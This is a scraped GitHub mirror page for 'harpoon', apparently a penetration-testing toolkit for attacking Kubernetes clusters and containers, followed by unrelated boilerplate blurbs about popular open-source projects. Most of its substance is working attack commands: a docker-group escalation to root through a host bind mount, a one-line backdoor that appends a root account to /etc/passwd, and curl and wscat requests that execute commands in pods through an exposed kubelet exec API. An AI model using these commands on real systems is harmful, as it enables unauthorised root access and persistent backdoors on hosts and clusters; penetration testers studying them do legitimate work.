professionallyevil / harpoon Goto Github PK
View Code? Open in Web Editor NEWA collection of scripts, and tips and tricks for hacking k8s clusters and containers.
License: MIT License
A collection of scripts, and tips and tricks for hacking k8s clusters and containers.
License: MIT License
If it turns out that you are a part of the docker group, escalate to root with the following:
docker run -it --rm -v $PWD:/mnt bash
We can also backdoor the machine after this with;
echo 'toor:$1$.PWORDHASH:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
Just another reason why Docker bind mounts can be dangerous >:)
harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]
If -e is given then if the preliminary checks pass, harpoon will try to exploit the mis-configuration. This attack only works if you can route to the node api. So, you either have to be on the same network, or it happens to be publicly routable.
[[ '${curl --insecure "https://<node>:10250/pods" 2>1 | head -c 2}' != '{"' ]] && echo Match
curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"
wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check
These are actually pretty similar to the docker checks
Can check for lxd socket. Is it mounted in a lxd container?
/var/lib/lxd/unix.socket
Can we check proc cgroups?
For example:
-oA <basename> output in all formats
-oG output in grepable format
-oN output in normal format
Give the fingerprint command the following interface.
harpoon fingerprint -[adklD]
-a run all checks (default)
-d run only docker checks
-k run only kubernetes checks
-l run only lxc checks
-D attempt to discover container tech in place
Many of the commands expect the -sock
and -cid
flags. However as I start generalizing the tool to work on other container setups, this might not be as viable. It's possible that I either break them out into separate tools. One for Docker, one for LXC, one for Kubernetes, etc... Or I implement several modules into the program, and allow them to be loaded and unloaded via command line args.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.